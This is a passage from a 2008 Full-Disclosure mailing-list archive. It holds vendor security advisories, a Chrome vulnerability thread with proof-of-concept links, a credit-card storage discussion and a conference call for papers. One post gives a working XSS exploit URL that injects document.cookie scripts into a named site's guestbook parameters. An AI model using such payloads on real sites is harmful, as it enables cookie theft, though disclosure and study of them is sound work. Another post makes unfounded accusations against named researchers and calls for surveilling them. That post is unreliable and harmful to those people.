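    [50213, 4097, 61230, 33001, 2842, 58190, 17777, 40404], TXIDS
)

if __name__ == "__main__":
    for name, cap in (("fixed", FIXED_PORT_CAPTURE),
                      ("sequential", SEQUENTIAL_PORT_CAPTURE),
                      ("random", RANDOM_PORT_CAPTURE)):
        print(name, assess_forwarder(parse_tcpdump(cap)))
```

Run it on `tcpdump -n udp dst port 53` output taken on the forwarder's upstream interface; a 'fixed' or 'sequential' port verdict means only the 16-bit transaction id protects replies, which is the condition the upgrade to 2.45 removes.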
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/ba5fdbe9/attachment.bin

From rbu at gentoo.org Thu Sep 4 20:52:03 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Thu, 4 Sep 2008 21:52:03 +0200
Subject: [Full-disclosure] [ GLSA 200809-03 ] RealPlayer: Buffer overflow
Message-ID: <200809042152.10171.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200809-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: RealPlayer: Buffer overflow
      Date: September 04, 2008
      Bugs: #232997
        ID: 200809-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

RealPlayer is vulnerable to a buffer overflow allowing for the
execution of arbitrary code.

Background
==========

RealPlayer is a multimedia player capable of handling multiple
multimedia file formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /               Unaffected
    -------------------------------------------------------------------
  1  media-video/realplayer   < 11.0.0.4028-r1         >= 11.0.0.4028-r1

Description
===========

Dyon Balding of Secunia Research reported an unspecified heap-based
buffer overflow in the Shockwave Flash (SWF) frame handling.

Impact
======

By enticing a user to open a specially crafted SWF (Shockwave Flash)
file, a remote attacker could be able to execute arbitrary code with the
privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All RealPlayer users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/realplayer-11.0.0.4028-r1"

References
==========

  [ 1 ] CVE-2007-5400
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5400

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200809-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 835 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/d60ed93e/attachment.bin

From rbu at gentoo.org Thu Sep 4 20:52:52 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Thu, 4 Sep 2008 21:52:52 +0200
Subject: [Full-disclosure] [ GLSA 200809-04 ] MySQL: Privilege bypass
Message-ID: <200809042152.55763.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200809-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MySQL: Privilege bypass
      Date: September 04, 2008
      Bugs: #220399
        ID: 200809-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in MySQL might allow users to bypass privileges and gain
access to other databases.

Background
==========

MySQL is a popular multi-threaded, multi-user SQL server.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  dev-db/mysql          < 5.0.60-r1                       >= 5.0.60-r1

Description
===========

Sergei Golubchik reported that MySQL imposes no restrictions on the
specification of "DATA DIRECTORY" or "INDEX DIRECTORY" in SQL "CREATE
TABLE" statements.

Impact
======

An authenticated remote attacker could create MyISAM tables, specifying
DATA or INDEX directories that contain future table files by other
database users, or existing table files in the MySQL data directory,
gaining access to those tables.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MySQL users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-db/mysql-5.0.60-r1"

References
==========

  [ 1 ] CVE-2008-2079
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200809-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 835 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/e7de0618/attachment.bin From mailinglist at brainiacghost.co.uk Thu Sep 4 17:46:33 2008 From: mailinglist at brainiacghost.co.uk (Chris Pritchard) Date: Thu, 4 Sep 2008 17:46:33 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> Message-ID: I don't think it's "your" list, and even if it was, you didn't have to be so rude about it -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Fionnbharr Sent: 04 September 2008 13:33 To: Juha-Matti Laurio Cc: full-disclosure at lists.grok.org.uk; evil fingers Subject: Re: [Full-disclosure] Google Chrome Browser Vulnerability dear god people, I've got null ptr derefs in firefox but I don't make full disclosure posts about them. I care about them nearly as much as vulnz in a browser no one uses for more than 5 minutes. Get the fuck off my list. 2008/9/4 Juha-Matti Laurio : > FYI: > This was assigned to BID30983: > http://www.securityfocus.com/bid/30983 > > Juha-Matti > > Rishi Narang [psy.echo at gmail.com] wrote: >> Hi, >> >> "Time" can definitely plays a major role. There was a collision that >> occurred due to the fact that I took time to find the real break point in >> the code, search for a template and to publish at EvilFingers site before >> sending it to Google and other bugtraqs. 
>> >> Even though I had the vulnerability 4 hrs well before the real publication >> of the bug and had the exploit along with the some crash details like "int >> 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions >> of http/ftp and further debug logs; there was this bug published (though >> without the details of possible cases, exceptions and mouse hover >> techniques) couple of hours before I released it out at EvilFingers. >> >> So, I would like to convey due credit to Mr. JanDeMooij as well for his >> posting the bug on http://code.google.com/p/chromium/issues/detail?id=122, >> and thanks to Mr. Brennan for contacting me about the same. >> >> -- >> Thanks & Regards, >> Rishi Narang | Security Researcher >> Founder, GREYHAT Insight >> Key: 0x8D67A3A3 (www.greyhat.in/key.asc) >> www.greyhat.in >> >> .. eschew obfuscation, espouse elucidation. >> >> Wednesday, September 3, 2008, 5:43:40 AM, you wrote: >> >> > -----Original Message----- >> > From: full-disclosure-bounces at lists.grok.org.uk >> > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi >> > Narang >> > Sent: Tuesday, September 02, 2008 7:51 PM >> > To: full-disclosure at lists.grok.org.uk >> > Subject: [Full-disclosure] Google Chrome Browser Vulnerability >> >> > Hi, >> >> > --------------------------------------------------- >> > Software: >> > Google Chrome Browser 0.2.149.27 >> >> > Tested: >> > Windows XP Professional SP3 >> >> > Result: >> > Google Chrome Crashes with All Tabs >> >> > Problem: >> > An issue exists in how chrome behaves with undefined-handlers in >> > chrome.dll version 0.2.149.27. A crash can result without user >> > interaction. When a user is made to visit a malicious link, which has an >> > undefined handler followed by a 'special' character, the chrome crashes >> > with a Google Chrome message window "Whoa! Google Chrome has crashed. >> > Restart now?". 
It fails in dealing with the POP EBP instruction when >> > pointed out by the EIP register at 0x01002FF4. >> >> > Proof of Concept: >> > http://evilfingers.com/advisory/google_chrome_poc.php >> >> > Credit: >> > Rishi Narang (psy.echo) >> > www.greyhat.in >> > www.evilfingers.com >> > --------------------------------------------------- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 7096 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/6fe0f457/attachment.bin From bugsquashr at gmail.com Thu Sep 4 21:05:38 2008 From: bugsquashr at gmail.com (bug squash) Date: Thu, 4 Sep 2008 16:05:38 -0400 Subject: [Full-disclosure] Xc0re Security Research Group GuestBook xss Message-ID: <819cb9500809041305t156f2b9bhbe2d8810f899fcd3@mail.gmail.com> ############################################################## # # Name : Xc0re Security Research Group GuestBook Xss # Author : El Chubacabra's Baby's Mama # Homepage : http://www.xc0re.net/ # ############################################################## Google dork: http://www.xc0re.net/ vulnerable - guestbook.cgi - comments, url, email, name parameters Exploit: 
http://www.xc0re.net/cgi-sys/guestbook.cgi?user=xc0rnet&action=addguest&basehref=http%3A%2F%2Fxc0re.net&template=default&name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&email=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&url=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&comments=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E sHoUtZ: Lame ass Muhammad Usman Saeed [Security Consultant] and Zainab Pervez "Submit your material now ! ;) 23-05-2008 Send all submissions like vulnerabilities , Papers &/or any thing related to security ! at submit at xc0re.net ! All the material submitted would be displayed on our website with its original author's name !" >you got it pal! And to my main man HUSSIN X - the most l33t h4x0r on the planet and possibly the solar system. From avri.schneider at gmail.com Thu Sep 4 23:16:29 2008 From: avri.schneider at gmail.com (Avraham Schneider) Date: Fri, 5 Sep 2008 01:16:29 +0300 Subject: [Full-disclosure] Hardcoded Keys In-Reply-To: References: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> <20080904002313.F473.5922242B@shaunc.com> Message-ID: > I believe it almost never happens. As I understand the card association > rules, the merchant has to hang on to the data for refund purposes. . . . > A few years ago I worked on a corporate credit-card processing system, and > I pushed for keeping a cryptographic hash of the credit card number, but > not the number itself. That would have eliminated the need to encrypt > card numbers, and any basis for accusing a programer of stealing card numbers. > > Alas, between card association rules, and the anti-fraud group wanting the > exact card number, my idea got discarded. Why didn't you suggest encrypting card numbers, without storing the decryption keys? If the user wants a refund - he will have to type his password (which will be the key) to decrypt the card number and the decrypted card number will be sent to the processing gateway. 
Since the user's password is not stored in the database, just the hash of it, you don't risk an attacker getting access to all credit card numbers if/once he hacks into your server... On Thu, Sep 4, 2008 at 8:21 PM, Bruce Ediger wrote: > >> On Wed, 3 Sep 2008 16:31:25 +0700 >> "Samuel Beckett" wrote: >>> After the successful credit card transaction, certain credit card details >>> are then encrypted and stored within the database. > > And then, on Thu, 4 Sep 2008, Shaun wrote: >> There is your worst case. Game over. > > Agreed. Keeping card number/CVV2 (or CID, or CVC, whatever you call it)/ > expiration date constitutes a real problem. > >> You process my transaction, you are done with my certain credit card >> details the moment you get an auth or nack from your gateway. You as a >> vendor should never see my credit card number to start with. You should >> be passing my transaction to an originating bank. Alas, we know this >> rarely happens. > > I believe it almost never happens. As I understand the card association > rules, the merchant has to hang on to the data for refund purposes. > > I will grant you that Chase/Paymentech will do arbitrary refunds, but I > don't think that's the case for other payment processors (the "gateway" > you mention above). In fact, I believe BillMatrix will only refund > a previously authorized and settled payment. The merchant has to have > all the right data, otherwise BillMatrix will reject the refund. > > A few years ago I worked on a corporate credit-card processing system, and > I pushed for keeping a cryptographic hash of the credit card number, but > not the number itself. That would have eliminated the need to encrypt > card numbers, and any basis for accusing a programer of stealing card numbers. > > Alas, between card association rules, and the anti-fraud group wanting the > exact card number, my idea got discarded. > > Since we're on the topic of credit cards, why don't we hear more about > refund fraud? 
> As near as I can tell, that's the part of the system
> that an insider could abuse the hell out of. Most corporations have some
> kind of internal accounting, so that making fake or fraudulent payments
> really can only happen for a few dollars, and then only for a month, or
> whatever the accounting period happens to be. But refunds, that's another
> story. As of 2 years ago, Paymentech would do arbitrary refunds: they
> didn't care if a corresponding payment had ever gotten authorized and
> settled. And corporations leave the decision about refunds up to
> customer service reps in a lot of cases. At the very least, there's little
> to no accounting for the refunds. A place ripe for a huge fraud to take
> place, if you ask me.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From security at mandriva.com Thu Sep 4 23:35:01 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 04 Sep 2008 16:35:01 -0600
Subject: [Full-disclosure] [ MDVSA-2008:186 ] python
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:186
http://www.mandriva.com/security/
_______________________________________________________________________

Package : python
Date    : September 4, 2008
Affected: Corporate 3.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Multiple integer overflows were reported by the Google Security Team
that had been fixed in Python 2.5.2 (CVE-2008-3143).

The Python packages on Corporate 3 have been updated to the latest
version 2.3.7, which corrects this issue.
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143 _______________________________________________________________________ Updated Packages: Corporate 3.0: 34e780fd42571387982688486bcfdad6 corporate/3.0/i586/libpython2.3-2.3.7-0.1.C30mdk.i586.rpm 9b0043b0cae2f92eb39a3cb48e35a50e corporate/3.0/i586/libpython2.3-devel-2.3.7-0.1.C30mdk.i586.rpm 27ec7af68b8ac69feef9d2e9c3f59d65 corporate/3.0/i586/python-2.3.7-0.1.C30mdk.i586.rpm 16a7791f08cf7d89a5780b8c25f4d65d corporate/3.0/i586/python-base-2.3.7-0.1.C30mdk.i586.rpm 2b2e39c9db5794abdd895220a38d8cd8 corporate/3.0/i586/python-docs-2.3.7-0.1.C30mdk.i586.rpm a631b1fd887fded582437d6799fffa5d corporate/3.0/i586/tkinter-2.3.7-0.1.C30mdk.i586.rpm a867d0a919c3fd0d9607d4cd64d89d3c corporate/3.0/SRPMS/python-2.3.7-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: 3bea043cedbf23095e6aae6f4eacbe04 corporate/3.0/x86_64/lib64python2.3-2.3.7-0.1.C30mdk.x86_64.rpm 9d576933f0699d5b7f0fc1bb78fd7514 corporate/3.0/x86_64/lib64python2.3-devel-2.3.7-0.1.C30mdk.x86_64.rpm e8a8494fcd526c0f3433dc03cb35672b corporate/3.0/x86_64/python-2.3.7-0.1.C30mdk.x86_64.rpm 7bf8423818a1e1221b51f28e05e3c616 corporate/3.0/x86_64/python-base-2.3.7-0.1.C30mdk.x86_64.rpm 79d213fe64ac42cf95d4c4072c813cae corporate/3.0/x86_64/python-docs-2.3.7-0.1.C30mdk.x86_64.rpm 437b615287bf5022edb1700f6d8b8790 corporate/3.0/x86_64/tkinter-2.3.7-0.1.C30mdk.x86_64.rpm a867d0a919c3fd0d9607d4cd64d89d3c corporate/3.0/SRPMS/python-2.3.7-0.1.C30mdk.src.rpm Multi Network Firewall 2.0: 34e780fd42571387982688486bcfdad6 mnf/2.0/i586/libpython2.3-2.3.7-0.1.C30mdk.i586.rpm 27ec7af68b8ac69feef9d2e9c3f59d65 mnf/2.0/i586/python-2.3.7-0.1.C30mdk.i586.rpm 16a7791f08cf7d89a5780b8c25f4d65d mnf/2.0/i586/python-base-2.3.7-0.1.C30mdk.i586.rpm a867d0a919c3fd0d9607d4cd64d89d3c mnf/2.0/SRPMS/python-2.3.7-0.1.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically 
use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIwDfHmqjQ0CJFipgRAnpYAKDN/AxpERzTga5Uptum3VNeW2kRJwCcCWZv stvEAyS71HncWdMnJdg+IUQ= =XDEP -----END PGP SIGNATURE----- From tmdhat at gmail.com Thu Sep 4 23:42:25 2008 From: tmdhat at gmail.com (The Mad Hatter) Date: Thu, 4 Sep 2008 19:42:25 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> Message-ID: <200809041942.25458.tmdhat@gmail.com> On Thursday 04 September 2008 13:46:33 Chris Pritchard wrote: > I don't think it's "your" list, and even if it was, you didn't have to be > so rude about it > I -- as well as many others in the list I'm sure -- have given up on this thread. As usual, its popularity is proportional to how much it sucks. If anyone has anything useful to say please consider creating another thread. From gem at rellim.com Thu Sep 4 23:38:29 2008 From: gem at rellim.com (Gary E. Miller) Date: Thu, 4 Sep 2008 15:38:29 -0700 (PDT) Subject: [Full-disclosure] Hardcoded Keys In-Reply-To: References: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> <20080904002313.F473.5922242B@shaunc.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yo All! 
> I believe it almost never happens. As I understand the card association > rules, the merchant has to hang on to the data for refund purposes. Nope, all you need to generate a refund is the original transaction ID. At least with the processors I use. You can get the PCI requirements here: https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml You are allowed to store the Card number, name and expiration date. Appendix B allows you to store that unencrypted. You are not allowed to store the mag stripe, CVC2 or PIN. RGDS GARY - --------------------------------------------------------------------------- Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701 gem at rellim.com Tel:+1(541)382-8588 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFIwGNoBmnRqz71OvMRAvHmAKCepmVQ4F5fOWdxU5VOD9gTMYW3rACcCWfe Fv3+09X/t92G6Du76Z9Bocs= =YoK0 -----END PGP SIGNATURE----- From xploitable at gmail.com Fri Sep 5 00:33:58 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 5 Sep 2008 00:33:58 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4b6ee9310809041632m5d7c3394o3769c8a150424c85@mail.gmail.com> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> <4b6ee9310809041632m5d7c3394o3769c8a150424c85@mail.gmail.com> Message-ID: <4b6ee9310809041633yb8e4b77vc00d8344f00bc60f@mail.gmail.com> On Thu, Sep 4, 2008 at 5:46 PM, Chris Pritchard wrote: > I don't think it's "your" list, and even if it was, you didn't have to be so > rude about it > It's Gadi Evron's list because Mossad told him to make it so. Who's really in control of the propaganda on this mailing list, Gadi Evron, he gets quoted in all the journalist articles as soon as he spams some new claim about which country is to blame for a cyber attack, and the journalists believe him, then it becomes the true version of events... even if it's not really. 
That's why I think it's time for journalists to rethink who the "trusted" security professionals are and who is gaming the system for political outcomes, that an intelligence agency has told them to make happen. It's true that Full-Disclosure is a powerful platform, and all it needs is a couple of Gadi Evrons and Dancho Danchevs spamming what the "truth" is and everyone goes with it. I find it suspicious that Dancho Danchev was a standard blogspot blogger one week, then after about two posts on Full-Disclosure was suddenly upgraded to the Zdnet zero-day blog... splitting out more information about cyber attacks and which country is to blame. We've got to keep an eye on the so-called "trusted" security professionals now, because they are trying to game the system for a political end, the intelligence services in the U.S. are responsible for a number of cyber attacks, which have been blamed on other countries and entities. I posted proof that Marcus Sachs wants to influence the political system in America at the highest level of government, so his group can get lots of money. So we know the mind set which is going on right now, so it's not like I haven't posted proof, intelligence agencies and certain "trusted" security professionals want control of "cyber" and they will do anything they can to get it. We must proceed with caution and think carefully about who is telling the truth before quoting "trusted" security professionals from now on. The Marcus Sachs Youtube video is extremely damaging for the security industry, what the true intentions are of some people and how power hungry they are. Would Marcus Sachs, Gadi Evron and Dancho Danchev etc tell a lie to become more powerful, you bet they would, especially if being leaned on by certain rogue elements of the intelligence agencies. 
The truth is, there are people out there looking to ramp up cyber security as a national security agenda, even though naturally cyber security is nowhere near being a national security issue, they still want to ramp it up anyway because it will give them power and money in an area that has yet to be decided upon. "Cyber" is like a new area, and folks are racing to become the leaders of cyber before one another, that's why it's a dangerous time right now and there is lots of propaganda flying around the mailing lists as soon as a cyber attack happens, which are probably false flags anyway created by the very people who are on Youtube videos looking for ways to become powerful with lots of money. I found the Cnet news article that goes with the Youtube video, we have *some* of the people that are power hungry in the photograph that's on the Cnet News article. 'Cybersecurity commission' to proffer advice to next president http://news.cnet.com/8301-13578_3-10009603-38.html We've got to follow these people around in real life, monitor their internet connection and phone calls to see who they are having discussions with, so no foul play happens because they are so desperate to impress the next administration. All the best, n3td3v From smaillist at gmail.com Fri Sep 5 08:45:01 2008 From: smaillist at gmail.com (Sowhat) Date: Fri, 5 Sep 2008 15:45:01 +0800 Subject: [Full-disclosure] XCon 2008 Call for Paper Message-ID: XCon 2008 Call for Paper

Nov. 18th - 19th, 2008, Beijing, PRC (http://xcon.xfocus.net)

XCon is wholeheartedly expecting papers from those who are passionate about information security technique and their participation and sharing of the conference.

Attenders
Anyone who loves information security, including information security experts and fans, network administrators, network security consultants, CIO, hacker technique fans, etc.
Location : Beijing Jintai Hotel http://www.bjjintaihotel.com/

Topics include (but not limited to):

--- Security in new fields
- Vista
- Web 2.0
- 3G/4G network
- Mobile Handset
- Banks & financial institutes
- GPRS & CDMA
- Routing device
- Visualization technique

--- Application security
- Web application vulnerability research
- Application reverse engineering and related automated tools
- Database security & attacks
- Protocol security & exploitation
- Advanced Trojans, worms and backdoor technique
- Encryption & decryption technique

--- Intrusion detection/forensics analysis
- File system analysis & recovery
- Real-time data structure recovery
- Reverse engineering (malicious code analysis technique, vulnerability research)
- Traffic analysis
- Intrusion detection and anti-detection technique

--- Wireless & VoIP security
- 802.11x, CDPD, Bluetooth, WAP/TDMA, GSM, SMS
- PDA & mobile protocol analysis
- Palm, Pocket Pc
- Wireless gateway
- VoIP security & vulnerability analysis
- WLANs hardening & vulnerability analysis

--- P2P technique
- Instant messenger (MSN, Skype, ICQ, etc.)
- P2P application (BT, Emule, Thunder, online multi-media, etc.)

Paper Submission

The submitted paper will include the following information :
1) Brief introduction to the topic. Please clarify if the topic has been previously publicized, and if so, the distribution scope.
2) Speaker's self introduction and work experience.
3) Speaker's contact information: full name, alias, nationality, network nickname, e-mail, tel, fax, current working place and company, IM (MSN, ICQ, YM, AIM or others).
4) Presentation details:
- duration
- if any new tool/vulnerability/exploit will be released
5) The paper must include both PPT (for presentation) and WORD (for detailed description) in MS Office or OpenOffice format.

All the papers will be submitted to cfp at xfocus.org for preliminary selection. The deadline for submission is Oct. 10th, 2008, and the deadline for confirmation is Oct. 20th, 2008. Whether or not the paper is accepted, we will officially inform you by the provided contact method within 5 working days.

Some important dates
* Deadline for submission - Oct. 10th, 2008
* Deadline for confirmation - Oct. 20th, 2008

Speakers' privilege
If your paper is accepted by XCon, you will be invited to give an individual lecture in XCon. The speakers will be provided with :
- Round-trip plane ticket (Economy class, and one person only. Foreign speakers up to 1,200 USD)
- Two days' food and accommodation
- Invitation to celebration party
- Tour to some well-known scenic spots and historical sites in Beijing, taste of Chinese flavored food
- Lucky draw

Important :
- Speakers must provide corresponding invoice or credential.
- XCon reserves the right of final explanation.

For more information about the conference, please contact xcon at xfocus.org or professional XCon2008 organizer. MSN: xfocusxcon at hotmail.com; tel : 086-010-62029792

Application

In order to attend the conference, please register at XCon website (http://xcon.xfocus.net) or directly contact the organizer mentioned above. We will offer different discounts according to the time of application. Attenders' food and accommodation will be covered by themselves, and XCon will provide restaurant reservation and other service.

Other information :

All the information about XCon will be released on XCon and Xfocus website. Please visit http://xcon.xfocus.org/ for more information about speakers, agenda and previous XCon documents.

Thank you for your support on XCon !

-------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080905/e5b16fc9/attachment.html From smaillist at gmail.com Fri Sep 5 09:40:19 2008 From: smaillist at gmail.com (Sowhat) Date: Fri, 5 Sep 2008 16:40:19 +0800 Subject: [Full-disclosure] XCon 2008 Call for Paper In-Reply-To: References: Message-ID: Got a couple of emails with comments (language mistakes) and questions, Thanks guys! Actually XCon is held by XFOCUS guys (Casper and others), they wrote it up and I was just helping to post the CFP. If you have any questions regarding the schedule, the conferences, the hotel, etc. Welcome to XCon! Welcome to China! Best Sowhat On Fri, Sep 5, 2008 at 3:45 PM, Sowhat wrote: > XCon 2008 Call for Paper -- Sowhat http://secway.org "Life is like a bug, Do you know how to exploit it ?" 
From smaillist at gmail.com Fri Sep 5 09:41:21 2008 From: smaillist at gmail.com (Sowhat) Date: Fri, 5 Sep 2008 16:41:21 +0800 Subject: [Full-disclosure] XCon 2008 Call for Paper In-Reply-To: References: Message-ID: If you have any questions, comments, please shoot against Casper ;) Though I am happy to forward it. On Fri, Sep 5, 2008 at 4:40 PM, Sowhat wrote: > Got a couple of emails with comments (language mistakes) and questions, > Thanks guys! > > Actually XCon is held by XFOCUS guys (Casper and others), they wrote > it up and I was just helping to post the CFP. > > If you have any questions regarding the schedule, the conferences, > the hotel, etc. > > Welcome to XCon! Welcome to China! > > Best > Sowhat > > On Fri, Sep 5, 2008 at 3:45 PM, Sowhat wrote: >> XCon 2008 Call for Paper > > -- > Sowhat > http://secway.org > "Life is like a bug, Do you know how to exploit it ?" 
> -- Sowhat http://secway.org "Life is like a bug, Do you know how to exploit it ?" From announce-noreply at rpath.com Fri Sep 5 04:52:55 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 04 Sep 2008 23:52:55 -0400 Subject: [Full-disclosure] rPSA-2008-0268-1 libtiff Message-ID: <48c0ad17.FyFsIApWBAzwv5Qs%announce-noreply@rpath.com> rPath Security Advisory: 2008-0268-1 Published: 2008-09-04 Products: rPath Linux 1 rPath Linux 2 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: libtiff=conary.rpath.com at rpl:1/3.8.2-3.1-1 libtiff=conary.rpath.com at rpl:2/3.8.2-5-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2724 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2327 Description: Previous versions of the libtiff package contain buffer underflows that may allow user-assisted attackers to execute arbitrary code using maliciously crafted TIFF files. Note that applications linked against libtiff may also be affected by this vulnerability, and will be fixed by this update. http://wiki.rpath.com/Advisories:rPSA-2008-0268 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From svrt at bkav.com.vn Fri Sep 5 14:12:49 2008 From: svrt at bkav.com.vn (SVRT) Date: Fri, 05 Sep 2008 20:12:49 +0700 Subject: [Full-disclosure] Google Chrome 0.2.149.27 'SaveAs' Function Buffer Overflow Vulnerability Message-ID: We (SVRT-Bkis) have just discovered a vulnerability in Google Chrome 0.2.149.27. This is a Critical Buffer Overflow Vulnerability permitting a hacker to perform a remote attack and take complete control of the affected system. We have submitted this Vulnerability to Google. They confirmed it and assigned a verifier for build 0.2.149.28. 
Proof of Concept: We tested Google Chrome 0.2.149.27 on Windows XP SP2 (Open Calculator) http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html With other Windows versions (not XP SP2): http://security.bkis.vn/Proof-Of-Concept/PoC-Crash.html

Details:
- Type of Issue : Buffer Overflow.
- Affected Software : Google Chrome 0.2.149.27.
- Exploitation Environment : Google Chrome on Windows XP SP2.
- Impact: Remote code execution.
- Rating : Critical.
- Description : The vulnerability is caused due to a boundary error when handling the 'SaveAs' function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users' systems.
- How an attacker could exploit the issue : To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.
- Discoverer : Le Duc Anh - SVRT - Bkis
- About SVRT : SVRT, which is short for Security Vulnerability Research Team, is one of Bkis's research groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems...
